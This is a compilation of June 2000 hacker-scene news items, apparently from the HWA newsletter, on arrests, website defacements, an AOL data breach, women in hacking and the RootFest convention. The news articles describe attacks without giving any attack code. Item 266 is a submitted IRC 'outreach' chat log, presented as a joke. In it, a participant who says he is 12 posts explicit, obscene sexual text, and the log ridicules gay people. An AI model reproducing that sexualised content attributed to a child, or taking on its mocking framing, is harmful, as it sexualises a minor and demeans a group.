broadcast, rewritten, or redistributed. @HWA 264.0 [IND] Youth Nabbed in Singapore for Hacking in Australia ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 12 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_061200d_j.shtml 6/12/00 Youth Nabbed in Singapore for Hacking in Australia 9:08 Monday 12 June 2000 DPA AN INDONESIAN youth who hacked into the computer server of a Singapore research and development institute while studying in Australia was arrested on coming to the city-state to study, it was reported on Saturday. The 15 year-old boy, who was released on 10,000 Singapore dollars ($A11,834) bail, was nabbed at his relative's apartment and his new computer seized, The Straits Times said. Police said the student hacked into the server at the Data Storage Institute when he was in Australia during March and April. The boy learned from an Internet chatroom that the institute's network was vulnerable and could be hacked into easily, they said. He continued hacking into the system after arriving in Singapore to study English and mathematics and was tracked down by the police Computer Crime Branch. A specialist at the institute had found unauthorised computer programmes within the system and unauthorised user accounts in operations. Some of the connections were made through overseas computer systems. A spate of hacking incidents has prompted Singapore judges to slap jail sentences on youthful offenders instead of probation. Police said they were continuing their investigation into the latest case. http://www.it.fairfax.com.au/breaking/20000612/A61943-2000Jun12.html @HWA 265.0 [IND]Facing a Man’s World:Female Hackers Battle Sexism to Get Ahead ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 12 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_061200e_j.shtml 6/12/00 http://abcnews.go.com/sections/tech/DailyNews/hackerwomen000609.html Facing a Man’s World Female Hackers Battle Sexism to Get Ahead The experience of women at the entry levels of the hacking scene, mostly in online chat groups, is one of relentless sexual harassment. It is a hard battle for women to be respected in a culture dominated by teenage boys By Sascha Segan June 9 For women hackers, there’s a different kind of glass ceiling to break. Hacking has traditionally been a man’s world. But women are quietly breaking into the hacker subculture, a loose group of computer enthusiasts who meet in online chat rooms and at real-life conventions. Not surprisingly, as in other male-dominated spheres, these women are often harassed and mocked by certain insiders though here it is by teenage boys, who make up most of the entry levels of hackerdom. The chat rooms where beginning hackers often learn technical tricks are stocked with little hacking boys from hell how awfully rude they are, and how intelligent they are, according to a hacker who goes by the handle Natasha Grigori and heads antichildporn.org, an organization of hackers who track down child pornographers on the Net. R-E-S-P-E-C-T But the few female hackers don’t network with each other in fact, some of their greatest trouble comes from other women, called scene whores hacker groupies who use sex to get ahead. Fortunately, the few women who break through to the elite ranks of hacking find that at the top, what matters is your technical skills, not your gender. If you can match their [male hackers’] skill level and better it, they’ll give you every ounce of respect. … It’s when a female comes in and tries to play on her being feminine, that doesn’t get you anything, says Blueberry, a 32-year-old woman from Brisbane, Australia, who founded condemned.org, another anti-child porn organization. ABCNEWS.com spoke to more than a dozen female hackers from the United States, Australia and New Zealand for this two-part series. Last week’s piece looked at who the female hackers are; this week, we examine the challenges they face. A note about names: Like most hackers, these women choose to go by online handles. Real names will be specifically marked as such. Hackers vs. Scene Whores Courtnee, a 20-year-old hacker from the Pacific Northwest, says the prevalence of hacker groupies makes it more difficult for true female hackers to get respect (www.twistedlens.com) There are plenty of women at hacker conventions they’re just not all hackers. Some are girlfriends, some wives. But the female hacker’s nemesis is the scene whore. These latex-clad hacker groupies haunt conventions and offer teenage boys cybersex in chat rooms to boost their own self-esteem, female hackers say. The average woman, in today’s society, could remain unnoticed, says Blaise, a 29-year-old woman from New Zealand. Looking at an average woman in a computer society that consists of mainly antisocial men, she will be the center of attention. It’s those girls that give every woman a reputation ...and that’s what you have to prove yourself against before you gain any respect. And the prevalence of scene whores has shattered any female solidarity that might exist among the hacker community, as groupies fight over the most highly skilled men and real female hackers fight the boys’ assumption that all women in the scene are groupies. When I first started in the scene, this one person said, you know, you can be my cyberwhore and you’ll be elite through association, says Blueberry, who says she rejected the advance. Dark Tangent, head of Defcon and a prominent male hacker, remembers a scene whore having videotaped sex with a male hacker in an elevator at the convention’s Las Vegas hotel. He warns of evil groupies who condition poorly adjusted male hackers to think of women as sex toys. Natasha says she regularly has to throw women out of the IRC chat room that she hosts because they disrupt the tech talk by offering cybersex to her teenage charges. It’s really bad as far as the women ripping each other to shreds. This whole cybersex thing really bothers me, Natasha says. A_kitten, a 34-year-old woman from California whose Web site features sexy photos of herself, has been described as everything from a scene whore to a Cult leader by terrified male hackers unwilling to give names to a reporter for fear of her legion of groupie script kiddies who used to crash sites on her command. She doesn’t deny using her femininity to get her way in a male-dominated society. People just assume that since I am a girl and I have that power that I must be abusing it, she says. I think some guys are intimidated or offended by the natural power that women possess. But St. Jude Milhon, a prominent hacker from Berkeley, Calif., doesn’t see using feminine wiles as part of the spirit of hacking. It wouldn’t be sporting. Simply be present, honest, reasonably competent, female, and everyone’s aghast. Fighting to Be Heard But it’s a hard battle for women to be respected in a culture dominated by teenage boys. The experience of women at the entry levels of the hacking scene, mostly in online chat groups, is one of relentless sexual harassment. British sociologist Paul Taylor, author of Hackers: Crime in the Digital Sublime, terms this the Wild, Wired West, a rough-and-tumble social environment determined by the attitudes of insecure teenage boys trying to impress each other with typed testosterone. It’s almost like some Lord of the Flies-type environment, he says, referring to William Golding’s novel about a group of teenage boys who descend into feral savagery when cut off from civilization. The anonymity of online interaction also fuels sexual harassment, making it more difficult to enforce social rules and freeing the most maladjusted young men to take out their sexual frustrations on people with feminine handles, Taylor says. The first time I posted, I posted with a woman’s nickname. I was ripped to shreds: ‘You’re a woman, get off here, we’re not going to help you,’ Natasha says. When RosieX, founder of the Australian cyberfeminist magazine GeekGirl, got into the online bulletin board scene in 1990, she found women so intimidated by that attitude that they pretended to be male to avoid harassment. I was frustrated, because I wanted to learn skills and all the boys wanted to do was f---, she says. Even a_kitten, who takes pride in her power over those boys, sneers at them. For every 50 jerks on IRC, I stumble upon one nice guy that I can talk to, she says. Non-Sexist Elite But the sexual gantlet seems to fade with experience. Defcon’s Dark Tangent says top-rank hackers generally stay away from the IRC channels, waiting to see whose thirst for knowledge is great enough to survive the savage atmosphere. To them, skill is all that matters, not the body it comes in. when you interact with people such as the L0pht, or the cDc or the most experienced members of the hacker culture, gender is a non-issue. It’s what you know that matters, and less who you are, says Javaman, a Philadelphia-area hacker. There is sexism at the lowest levels, but among the more skilled people, the more able people, it really is a non-issue. And at conventions, hackers seem to love nothing more than a woman who can fix a network Breakdown. Though they’re tormented online, for some reason the rare women in hacking are treasured in person, female hackers say. Girls are victimized only in the bodiless state in the flesh, they’re objects of wonder and fascination, says Milhon. @HWA 266.0 [IND] Social study: staunch religious hackers? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (url pulled) Interesting discussion sent in detailing something about religion and how it affects the modern hacker culture, or is it just some guy taking the piss out of some _____r h___ r_____s? - Ed Submitted by: Mehmet Ali Agca and the Christpunchers ůíů Starting logfile IrcLog IRC log started Mon Jul 10 13:27:27 2000 ůíů Value of LOG set to ON cool noticed that a couple of new ones have been added yes servers up to 124 now! IOM has set up quite a few specialist channels on ccnet i've been asking jesus what to do including #cult_outreach, #abuse_outreach, #youth_outreach, #porn_outreach etc I just read the doctrinal statement on the web page. I was impressed. but i just can't find the answeres can anyone help? What is your question joshua? what about joshua? ok r u from a gay background joshua? i know the bible teaches me not to be gay but i'm lusting over this guy that is also gay i know lust is a sin would u like to read an email i wrote about ministering to gays? but i can't control my urges ůíů SignOff wreath: #Gay_Outreach (Connection reset by peer) what should i do? It only feels like you can not control your urges joshua, God says that you CAN control them with His help. One aspect of the fruit of the Spirit is *self-control* well for a start joshua u have to realise you cannot do this in your own strength we are powerless to fight sin in our own strength the bible calls that striving amen but how do i do that? and we set ourselves up for a fall when we do we must rely on Gods ability to deliver us from temptation and to set us free from the works of the flesh temptation is strong, though yes it is..... how old r u joshua? 12 hmm really? ůíů Adri [CCNet6.0@edtn013749.hs.telusplanet.net] has joined #Gay_Outreach yes josh, have you given in to your lusts and had sex with anyone? how olds this other boy Jushua? Denis: no Good! Eagle^: i don't know ok are u a christian josh? ShermAway: hardcore 100% :))) good ůíů Guest42617 [JAVGUEST@98AF8102.ipt.aol.com] has joined #Gay_Outreach do u believe God can help u? ůíů Guest42617 is now known as Tzadok Hi Sherm josh, work like crazy NOT to do it brother. Right now you have no experiential history that can be used to draw your further into sin. Make a real strong cimmittment not to give into you desires. ShermAway: yes ůíů Tzadok was kicked off #gay_outreach by ShermAway (ShermAway) ůíů mode/#Gay_Outreach [+b *!*@98AF8102.ipt.aol.com] by ShermAway autoban on him folks hes a troublemaker josh - do u read your bible? Growing up in Jesus is all about saying no to the evil desires that we face. That is part of what it means to become a man. ShermAway: not as much as i should ok do u where 1 corinthians is? i love god and i want him to be my best friend. he is my home boy. ShermAway: yes ok look up this verse 1 cor 10:13 No temptation has overtaken you but such as is common to man; and God is faithful, who will not allow you to be tempted beyond what you are able, but with the temptation will provide the way of escape also, that you may be able to endure it. then believe it!!! God will provide an escape route out of all temptation our part is to look for it and then take it! :) sounds like a plan no to give into the sin yep it works well if you trust God to deliver you from temptation He always keeps His promises It is such a wonderful thing to see how weak we are josh, and then to see how God's power can give us the strength to be pure and holy. He is always there with His strength and with a way of escape. i just want to shove my hard pounding love muscle into his greasy asshole as we are embraced in hot gay sex. i want to feel his manliness inside of me. i want to grab that mouth of his and take a big fat shit in it oh dear >>> You have been kicked off #gay_outreach by ShermAway (ShermAway) ůíů [#gay_outreach] Banned from channel IRC log ended Mon Jul 10 13:40:02 2000 | -=- | | @HWA 267.0 [IND] Ex-KGB Major Leads US War Against Hackers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 12 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_061200f_j.shtml 6/12/00 Ex-KGB Major Leads US War Against Hackers Date: 10/06/2000 By BEN FENTON in Washington A former senior KGB officer who defected to America is patenting a new device to thwart hackers and could be the saviour of the US computer industry. Victor Sheymov is also poised to become the next "dot com" multi-millionaire after he left the service of American intelligence to found a "cybersecurity" company outside Washington. The ex-KGB major has even persuaded James Woolsey, a former director of the CIA, to join his board of directors. Mr Sheymov was smuggled out of Moscow with his wife and daughter by the CIA. Soon he was working for the highly secretive National Security Agency (NSA) trying to find ways of breaking into the KGB communications systems that he had designed. He turned to the private sector after falling out with the CIA over the dlrs 1 million ( pounds 670,000) he says he was promised as part of his defection package. "The CIA cheated me in a major way," he told the New York Times. Although he defected more than 20 years ago, he only settled his differences with the American government last year. By then he had started work on his "algorithm", a set of programming instructions for a computer, which he believes can make any machine impregnable to hackers. Hacking has become a threat to America's military and corporate infrastructure. Both the State Department and the FBI have been embarrassed by breaches of computer security. The agency employs young hackers to test its own security and to break into the systems of foreign governments, terrorist organisations and drug syndicates. After perfecting his algorithm, Mr Sheymov used his former NSA colleagues to test it. "We tried and we couldn't get in," said one expert hacker with 18 years of service at the agency. The Daily Telegraph http://www.smh.com.au:80/news/0006/10/text/pageone3.html This material is subject to copyright and any unauthorised use, copying or mirroring is prohibited. @HWA 268.0 [IND] Flagship Hong Kong Govt Web Site Defaced, Twice ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 13 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_061300a_j.shtml 6/13/00 Flagship Hong Kong Govt Web Site Defaced, Twice By Adam Creed, Newsbytes HONG KONG, CHINA, 13 Jun 2000, 12:02 AM CST A flagship Hong Kong Government Web site was defaced twice over the weekend, resulting in its eventual closure and the start of criminal investigations by local police authorities. The Interactive Government Services Directory (IGSD) was recently launched in Hong Kong - promoted as an online gateway to government services information for Internet users. On June 10, a spokesman for Hong Kong's Information Technology Services Department confirmed the directory Web site front page had been defaced during the afternoon. "Two messages were found attached on the home page of the IGSD shortly after 3.30 pm," said the spokesman. "To facilitate investigations into the incident, we closed down the system at about 3.45 pm." It is unclear what the nature of the security breach was and if any changes were made to secure access to the site ... because at around the same time the following day the Web site was again defaced. The service was then shut down and remains offline as of Tuesday Hong Kong time. The spokesman said the site would remain offline in order to "solve the problems created by two defacement cases over the weekend." According to the Information Technology Services Department, the IGSD Web site is hosted on a stand-alone server separate from Hong Kong Government internal computer networks. The Hong Kong Police are investigating the matter. The IGSD Web site can be found at http://www.igsd.gov.hk . @HWA 269.0 [IND] Modest Teenager Is FBI's Secret Weapon In War Against Cyber Crime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 13 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_061300b_j.shtml 6/13/00 Modest Teenager Is FBI's Secret Weapon In War Against Cyber Crime The Federal Bureau of Investigation consults a 19-year-old student from Sweden several times a week to discuss new strategies for their fight against computer hackers, it has been revealed. News of Jonathon James' prowess as a cyber sleuth followed his breakthrough in tracking down the culprit behind last year's Melissa virus. And after news of the Love Bug broke in May, it was James who the FBI turned to before its origins could be traced to the Philippines. So far more than 150 foreign journalists have called or visited him at his home in Uppsala, a town just a few miles north of Stockholm. But despite mounting international fame, he is keen to play down his role for the FBI, preferring to concentrate on his ongoing studies and plans for a future business enterprise. However, he is prepared to offer some commentary on the current state of global e-commerce and internet communications. While governments are generally still rather complacent about online security, fears about online shopping are too often exaggerated, he told Reuters reporters. Last updated: 12:18 Monday 12th June 2000. http://www.ananova.com/news/story/internet_us-internet-crime_142970.html Modest teenager is FBI's secret weapon in war against cyber crime The Federal Bureau of Investigation consults a 19-year-old student from Sweden several times a week to discuss new strategies for their fight against computer hackers, it has been revealed. News of Jonathon James' prowess as a cyber sleuth followed his breakthrough in tracking down the culprit behind last year's Melissa virus. And after news of the Love Bug broke in May, it was James who the FBI turned to before its origins could be traced to the Philippines. So far more than 150 foreign journalists have called or visited him at his home in Uppsala, a town just a few miles north of Stockholm. But despite mounting international fame, he is keen to play down his role for the FBI, preferring to concentrate on his ongoing studies and plans for a future business enterprise. However, he is prepared to offer some commentary on the current state of global e-commerce and internet communications. While governments are generally still rather complacent about online security, fears about online shopping are too often exaggerated, he told Reuters reporters. Last updated: 12:18 Monday 12th June 2000. @HWA 270.0 [IND] Daemons on the Net:Stereotyping the hacker ** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 13 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_061300c_j.shtml 6/13/00 Daemons on the Net Stereotyping the hacker Summary SunWorld columnist Carole Fennelly defends the term hacker and offers a rebuttal to "Invisible Enemies," a recent article in Vanity Fair that which she calls "a sensationalist, good-versus-evil script filled with the sort of cheap stereotyping found in TV movies." (700 words) -------------------------------------------------------------------------------- I was at a conference recently talking with the CEO of a computer security company who emphatically stated, "We don't hire hackers." Curious, I asked if she meant that her company doesn't hire people with criminal records. She clarified: "We don't hire people who attend DefCon, have online handles, or who participate in hacker forums. Or who hang around with hackers." In other words, her company doesn't hire people who don't conform to the mainstream. I wonder how she and her HR department determine which job candidates are associating with undesirables? http://www.idg.net/ic_188368_1794_9-10000.html UNIX SECURITY -------------------------------------------------------------------------------- By Carole Fennelly I was at a conference recently talking with the CEO of a computer security company who emphatically stated, "We don't hire hackers." Curious, I asked if she meant that her company doesn't hire people with criminal records. She clarified: "We don't hire people who attend DefCon, have online handles, or who participate in hacker forums. Or who hang around with hackers." In other words, her company doesn't hire people who don't conform to the mainstream. I wonder how she and her HR department determine which job candidates are associating with undesirables? Is that perhaps why the term hacker is so controversial? Because hackers don't conform? The US Founding Fathers didn't conform, either. Down through the ages, any group that didn't conform to mainstream society was subject to various forms of persecution: the Inquisition, the Salem witch trials and, more recently, the McCarthy hearings. It's rather ironic that the United States, which was founded on the principles of accepting diversity, supported McCarthy's modern version of a witch hunt. It's comforting to look back on those days of investigating subversives as a black moment in the history of democracy, from which we have thankfully learned a lesson. But have we? The June issue of Vanity Fair has an article by Bryan Burrough titled "Invisible Enemies." According to the editor, this is supposed to be an article detailing "high-tech procedural detective work." In reality, it is nothing more than a sensationalist, good-versus-evil script filled with the sort of cheap stereotyping found in TV movies. Perhaps that was what Burrough was looking for in the first place. Who cares about the facts? After all, this is Vanity Fair -- entertainment, not real news. I care. I care because I work in an industry where I have to deal with the consequences of this stereotyping. Burrough picked up on the squeaky-clean image of J.P. Vranesevich, founder of AntiOnline, and cast him as the Hero of this little melodrama. It doesn't matter that Vranesevich is nothing more than a paid snitch with limited technical ability; he looks wholesome. He fits the part of Upstanding American Youth. Burrough chose Vranesevich's harshest critic, Attrition.org founder Brian Martin, to play the Villain. After all, Brian looks like he just stepped off the set of The Crow and hangs around with subversives. It doesn't matter that he is a six-year veteran of the professional security field and has the respect of law enforcement and journalists. He looks dangerous. He fits the part of the Evil Hax0r. I won't get into the specifics of everything that's wrong with this 10,000-word article (though the fact that it is 10,000 words too long is its first problem). Brian posted a rebuttal on the Attrition site that addresses some of the issues. "But", a techie might argue, "what do I care? I just want to know about the latest product releases and bugs. I don't care about that other stuff." Well, upper management does, and, like it or not, mangers set the policies that govern how the techies play with the bits and bytes. Do you really want your managers to decide what nightclubs are acceptable for you and your fellow employees, and dictate the sort of person with whom you may associate? "Oh, that'll never happen," you might say. Yeah. And we didn't think McCarthyism could happen here either. McCarthyism isn't dead -- it's just found a new target. About the author Carole Fennelly is a partner in Wizard's Keys Corporation, a company specializing in computer security consulting. She has been a Unix system administrator for almost 20 years on various platforms, and provides security consultation to several financial institutions in the New York City area. @HWA 271.0 [IND] China: Defiant Cyber Surfers Play Cat-and-Mouse Game ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 13/(8th) 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_061300d_j.shtml 6/13/00 China: Defiant Cyber Surfers Play Cat-and-Mouse Game JOSEPHINE MA Thursday, June 8, 2000 Defiant cyber surfers in mainland China can run Web sites and circumvent police control by using overseas service providers. The Web site run by Huang Qi - 6-4tianwang.com- operates via a US-based Internet service provider. This means its content can be updated either on the mainland or in the United States and mainland surfers can easily slip through filters set by mainland cyber police. http://technology.scmp.com/internet/DAILY/20000608084435429.asp Published on Thursday, June 8, 2000 INTERNET Defiant cyber surfers play cat-and-mouse game JOSEPHINE MA Defiant cyber surfers in mainland China can run Web sites and circumvent police control by using overseas service providers. The Web site run by Huang Qi - 6-4tianwang.com- operates via a US-based Internet service provider. This means its content can be updated either on the mainland or in the United States and mainland surfers can easily slip through filters set by mainland cyber police. The site was still accessible on Wednesday and a statement about Mr Huang's arrest - apparently by its operators in the US - was posted on its homepage on Wednesday night. The chat room also remained open. When the authorities try to block sites like 6-4tianwang.com, surfers can still manage to access them by using overseas or other methods. The Web site was launched in June last year as the first in China dedicated to helping people find relatives abducted by traffickers. The case of 6-4tianwang.com highlights the difficulties faced by mainland authorities in policing the Internet. Cyber police have issued numerous regulations to tighten their grip on the Internet. And the State Council recently set up a special division under its Information Office to monitor news on the Web. But there are plenty of indirect routes to post messages on the net and there are always ways to access them. Examples include discussions about the 1989 Tiananmen Square crackdown - a subject considered taboo by the authorities. No matter how fast Web masters move to delete messages posted on their chat rooms, surfers can always shift to other chat rooms to continue their discussions. It was not the first time Mr Huang had been in trouble with the authorities. The Web site was shut down by police in March over reports concerning the human rights of Chinese labourers working overseas. It was reopened in April apparently with the help of a US-based Chinese group. Undeterred, Mr Huang went further late last month and began to post news related to the 1989 democracy movement on the Web site, until his arrest on Saturday. @HWA 272.0 [IND] Hacker's Humorous Tips to Websites ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 13/14 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_061400a_j.shtml 6/14/00 Hacker's Humorous Tips to Websites KUALA LUMPUR: In a somewhat amusing vein, "Xenophoria,'' the hacker who hacked into anti-reformasi websites, went online yesterday to offer tips to pro-reformasi websites to protect them from being hacked. In a letter to Malaysiakini, Xenophoria advised the pro-reformasi webmasters to stop using the US-based Tripod service to host their websites. Saying the tripod.com security system was "rather weak,'' he added: "If Junior Hacker, who breached the Laman Reformasi website, found a hole in tripod.com, there is every possibility that other pro-reformasi websites would suffer the same fate. On Friday, the popular Laman Reformasi, also known as Mahazalim, was hacked by someone who called himself "Junior Hacker,'' who posted an obscene picture of a man sodomising another. This was an apparent reference to Datuk Seri Anwar Ibrahim, who is currently undergoing trial for allegedly committing sodomy. Tripod then cancelled the website's membership, stating that "storing adult content'' was in clear violation of the terms of service agreement. In the letter, Xenophoria said he had himself proven the tripod.com security system was rather weak by hacking the http://bnlist.com website. Tuesday, June 13, 2000 http://www.thestar.com.my/online/newsreport.asp?file=/2000/6/13/nation/1304szpa.asp&newspage=nation The Star @HWA 273.0 [IND] r00tfest 2000: Computer Hackers Ride into Town Today ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 14 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_061400b_j.shtml 6/14/00 http://www.pioneerplanet.com/yhoo/mtc_docs/020426.htm Computer Hackers Ride into Town Today RiverCenter is site for `RootFest 2000' -------------------------------------------------------------------------------- LESLIE BROOKS SUZUKAMO STAFF WRITER -------------------------------------------------------------------------------- It's billed as the Midwest's largest computer security convention, but when the three-day RootFest opens in St. Paul's RiverCentre today, think of it simply as hackers' heaven. Heaven, after all, is supposed to be fun, and, in this case, for good hackers. And that's what RootFest hopes to promote -- hackers as the guys in the white hats who actually improve security on the Internet as they light up brain cells and hard drives trying to poke holes in computer security systems. ``A lot of the mainstream press and the public at large view hacking as synonymous with criminal activity. They believe every hacker is a criminal and that's just not true,'' said Michael Monson, RootFest's founder and organizer. ``Hacking isn't just about breaking into computers,'' Monson said. ``Hacking is about learning and making computers do things they were not originally designed to do -- taking it a step further. ``Making a program run faster or use less power would be a good hack,'' he said, as an example. Monson is a hacker. He's 21, soft-spoken and wears a goatee, a tiny silver stud in each earlobe, and a skinny ponytail over the collar of his neat white polo shirt and khaki slacks. No one online knows him as Monson, though. Instead, he's Lothos, named after the head vampire character from the ``Buffy the Vampire Slayer'' movie, and a member of the Legions of the Underground, a worldwide hackers community in cyberspace. He's also a computer network security engineer. He said it was two years ago when he conceived of RootFest with ``root'' -- in this case -- referring to a starting directory in a computer. He had heard about Defcon, another larger, older hacker convention held annually in Las Vegas, and thought, ``That's pretty cool. I wish I could go.'' He figured there were other hackers from the Midwest who couldn't afford a junket to Vegas, so he threw together the first RootFest at the Minneapolis Convention Center last spring. That effort attracted 200 people, primarily from the Midwest, but also from as far away as California and the Netherlands, he said. It's estimated that up to 1,000 may attend this year. The first convention also attracted attention, not all of it positive. The head of Minneapolis' information technology systems put out an e-mail that warned city computer users to be extra careful while the hackers were in town. ``Sometimes, these individuals hack into computers to perform fairly harmless computer pranks; however, that is not always the case,'' warned Don Saelens, the chief information officer for the city of Minneapolis. No trouble was reported, however. Saelens said recently that he was responding to the fears of department heads who had heard about the convention ``and tend to respond a little emotionally.'' The 50-year-old information chief said his younger ``tool-smart'' staffers especially enjoyed the convention. Some of them even participated in the hacking contest, in which contenders lug their home computers into the convention center, plug into a network closed off from the Internet and try to hack into other contestants' computers. ``They really loved talking tech with each other,'' Saelens said. Jim Kavaloski, director of information services for Ramsey County, said he is not concerned about the hackers hitting town. The county already uses state-of-the-art anti-virus software for its 2,900 personal computers, he said. ``When we talked about it, we asked ourselves what we could do and really, there's nothing more you can do,'' Kavaloski said, adding, ``The iloveyou virus came from the Philippines, after all. They don't need to be in St. Paul.'' Monson hopes law enforcement and computer security experts mingle with hackers and exchange ideas. Some security experts like himself once were hackers who thrilled to the challenge of penetrating a system in the same way that mountain climbers try to scale tall peaks -- because they are there. John Edwards, a special agent with the Minnesota Bureau of Criminal Apprehension who specializes in computer crimes, agrees that not all hackers are malicious. ``The Bill Gateses and Steven Jobs of the world built all these computer companies, but they were once hackers,'' he said. Sgt. Brook T. Schaub of the St. Paul Police Department, another computer crime specialist in the sex crimes unit, also divides hackers into the ``white hats'' and ``black hats'' -- those who pierce security systems and may install a banner announcing they were there and those who break into systems to wreak havoc or steal private data like credit card numbers. However, Schaub noted that even white hats who hack simply for the joy of solving a difficult puzzle are committing, at the very least, a misdemeanor when they break into a system. Black hat hackers can receive up to 10 years in prison for felony break-ins that cause more than $2,500 in damage, he said. Most hacking crimes go unreported, the officers said, because companies are not eager to reveal system vulnerabilities or scare their customers. Edwards estimates 80 percent of computer crime is committed by disgruntled employees or former employees, not outside hackers. Monson said he and other hackers condemn destructive attacks such as those earlier this year that shut down systems serving sites like eBay and amazon.com. He hopes the convention will earn the hackers respect. ``I hope so,'' he said. ``I believe it will happen.'' -------------------------------------------------------------------------------- Leslie Brooks Suzukamo can be reached at lsuzukamo@pioneerpress.com or at (651) 228-5475. Hackers, crackers and script kiddies Not every hacker is a cracker, and all have a disdain for script kiddies. Here's a short ``who's who.'' Hacker. Someone who picks apart a computer system and delights in the intricacies. Sometimes, a hacker penetrates a computer's security system just to test the system's integrity, then notifies the owner of holes the system. Other hackers tinker with systems the way hot-rodders tinker with cars, souping them up to run faster, smoother or use less power. Cracker. A term most hackers use for hackers who specialize in penetrating or ``cracking'' into a computer system. Often, this term refers to hackers with malicious intent who attempt to wipe out data or steal it. Script kiddie. A term of derision used to describe hackers/crackers who break into computer systems, not by writing their own computer code, but by copying prewritten code they find on the Internet. Most are young or don't have the skills needed to hack into a system by themselves. @HWA xx.x [IND] June 19 Hackers Steal Subscriber Data From AOL Network ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 19 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_061900a_j.shtml 6/19/00 Hackers Steal Subscriber Data From AOL Network By Ariana Eunjung Cha, Washington Post Staff Writer WASHINGTON, D.C., U.S.A., 19 Jun 2000, 12:07 PM CST Hackers broke into America Online Inc.'s computer network this week and pilfered information such as names, addresses and credit-card numbers from some subscribers, company officials said late yesterday. AOL spokesman Rich D'Amato said only "a very limited" number of the records of the company's more than 23 million subscribers had been accessed and that the company had begun contacting those customers directly. He said AOL was working with law enforcement officials to investigate the matter. "We are taking these claims very seriously," he said. "We employ the highest level of security and we have already deployed additional security to prevent this from happening again." D'Amato said hackers first compromised some employee accounts by tricking them into downloading a Trojan horse program that allowed them to hijack the accounts. They then used those customer service accounts to access subscriber data. News about the security breach was posted Thursday on the Observers.net Web site, a popular gathering place for current and former employees and volunteers of AOL, and spurred the company's investigation, D'Amato said. The Observers.net site said information was stolen from about 500 subscribers. Kelly Hallissey, one of the Observers.net site's administrators, said yesterday that the trouble began about a week and a half ago inside one of the Internet's original chat rooms. She said 20 to 30 people were in the chat room when one of them started bragging about how he could break into AOL. When challenged, he offered step-by-step instructions on how to get into the company's Customer Relations Information System. "Someone ran his mouth and the next thing I knew everyone was talking about how to break in," she remembered. On Thursday, Hallissey said she logged on to find several e-mails with screen shots of her own records, including the entire credit-card number she had used to sign up to AOL. AOL's status as the world's largest online service makes it a popular target for hackers. Last October, a teenager pleaded guilty to altering data and programs on AOL's internal systems, which would cost $50,000 to fix. Mark Chen, chief technology officer at Palo Alto, Calif.-based Securify.com, said the latest attack on AOL was fairly simple but deadly, because once someone gets through the security perimeter, he has access to "all the powers of a person on the inside." A Colorado Springs teen who goes by the online moniker Ytcracker--and was one of the authors of the Observers.net posting--said he is part of a group of seven young men who spend their time probing the vulnerabilities of AOL's vast network. "It's a pretty interface and it looks secure enough. But when you dig down deep, there is a lot of stuff you can compromise," he said in an interview. @HWA 274.0 [IND] UK Watchdog Warns Net Banks Over Hackers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 20 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_062000a_j.shtml 6/20/00 UK Watchdog Warns Net Banks Over Hackers By Sylvia Dennis, Newsbytes LONDON, ENGLAND, 20 Jun 2000, 7:24 AM CST The Financial Services Authority (FSA), the UK's financial services regulator, has told banks that they must take more care with their online security. The warning comes after the FSA found inadequacies in defense systems against hackers on the sites of several unnamed UK Internet banks. Speaking on Monday at the British Bankers Association, Howard Davies, the chairman of the FSA, said that online banks also need to pay more attention to strategy and to coping with unexpectedly large numbers of users. Davies added that the FSA's research had identified the key risks that banks must manage as they introduce and develop their e-banking services. He said that there is a definite need for senior management to be firmly in charge of their Internet strategies, as well as to effectively manage their security risks. In his speech, he also outlined the reputation risks of rushing products to the market too early, with the result that online users became frustrated with problems they encounter. Davies added that there is also a strategic and business risk with online banking services. Senior management, he said, needs to be firmly in charge of the direct effects of their Internet strategies, and of the potential indirect effects on the underlying profitability of their business "There is a risk that people with strong technological, but weak banking skills can end up driving e-initiatives. One consequence may be that these initiatives do not attract the types of customers that banks want or expect, and may have unexpected implications for existing business lines," he said. "Banks may face new competition too. E-banks are easy to set up, so lots of new entrants are arriving on the scene. And old-world systems, cultures and structures do not encumber these new entrants," he added. This issue, he went on to say, was closely linked to business risk, key elements of which, such as the ability to assess credit and liquidity risk, present themselves in new guises in an e-banking world. The good news for the e-banking world, Davies told his City audience, is that UK banks have found little evidence of material success for hackers. "This suggests that, for the moment, they have in place sufficiently robust barriers to repel attacks attempted on their gateways," he said, adding that banks should be careful not to get too confident about the issues involved. "While banks tend to have reasonable perimeter security, we have sometimes found insufficient segregation between internal systems, and poor internal security. So we are encouraging banks to look at the firewalls between their different systems to ensure adequate damage limitation should an external breach occur," he said, adding that, as ever, the greatest threat so far has been from the enemy within. Davies said that it is now very difficult in the Internet environment to predict and manage the volume of customers that e-banks will obtain. Many banks going online, he said, have significantly misjudged volumes, usually making estimates which turn out to be too cautious. "When a bank has inadequate systems to cope with demand there may be both financial and reputational damage, and even compromises in security," he said. The FSA's Web site is at 